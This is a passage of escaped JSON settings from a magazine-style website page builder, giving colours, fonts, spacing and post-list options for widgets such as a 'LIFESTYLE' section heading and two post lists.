gn_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#385c7b\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"content_width\":{\"unit\":\"px\",\"size\":\"\"},\"gap\":\"no\",\"height_inner\":\"default\",\"custom_height_inner\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"48.082\",\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"offset\":\"\",\"category\":[\"8\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"use_shadow\":\"use\",\"use_icon_post_list_1\":\"on\",\"post_icon_color1_post_list_1\":\"#61c436\",\"post_icon_color2_post_list_1\":\"#007AFE\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"on\",\"post_view_color_post_list_1\":\"#ffffff\",\"post_list_1_view_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight\":\"600\",\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"use_category_post_list_1\":\"on\",\"typhography_category_post_list_1_color\":\"#ffffff\",\"post_list1_category_title_hov_color\":\"#ffffff\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight\":\"600\",\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"use_title_post_list_1\":\"on\",\"typhography_title_post_list_1_color\":\"#000000\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"600\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_meta_post_list_1\":\"on\",\"typhography_meta_text_post_list_1_color\":\"#999999\",\"typhography_meta_post_list_1_color\":\"#000000\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight\":\"600\",\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"on\",\"typhography_excerpt_post_list_1_color\":\"#777777\",\"post_list_1_excerpt_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"typhography_read_more_post_list_1_color\":\"#000000\",\"post_list1_read_more_title_hov_color\":\"#111111\",\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight\":\"400\",\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"typhography_read_more_border_post_list_1_color\":\"#000000\",\"post_list1_read_more_border_hov_color\":\"#111111\",\"section_magzma_post_list_1_column_control\":\"\",\"post_list1_margin_bottom\":\"20\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"51.918\",\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"u0g757k\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list_3_post_setting\":\"\",\"posts_per_page\":\"5\",\"offset\":\"1\",\"category\":[\"8\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-3\",\"section_magzma_post_control\":\"\",\"vertical_position\":{\"unit\":\"px\",\"size\":0},\"vertical_position_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_mobile\":{\"unit\":\"px\",\"size\":0},\"hide_image\":\"\",\"width\":\"300\",\"height\":\"200\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"#61c436\",\"post_icon_color2\":\"#007AFE\",\"post_icon_size\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":10},\"use_title\":\"on\",\"typhography_title_color\":\"#000000\",\"typhography_title_hov_color\":\"#aaaaaa\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"title_font_weight\":\"700\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_category\":\"on\",\"typhography_category_color\":\"#000000\",\"category_title_hov_color\":\"#000000\",\"category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"category_font_size\":{\"unit\":\"px\",\"size\":12},\"category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"category_font_weight\":\"700\",\"category_font_weight_tablet\":\"600\",\"category_font_weight_mobile\":\"600\",\"use_date\":\"on\",\"typhography_date_color\":\"#777777\",\"date_title_hov_color\":\"#777777\",\"date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"date_font_size\":{\"unit\":\"px\",\"size\":12},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"section_magzma_column_control\":\"\",\"margin_bottom\":\"19\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-3\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"7a3ej6o\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"LIFESTYLE\",\"title_size\":\"h4\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#00c5b5\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG 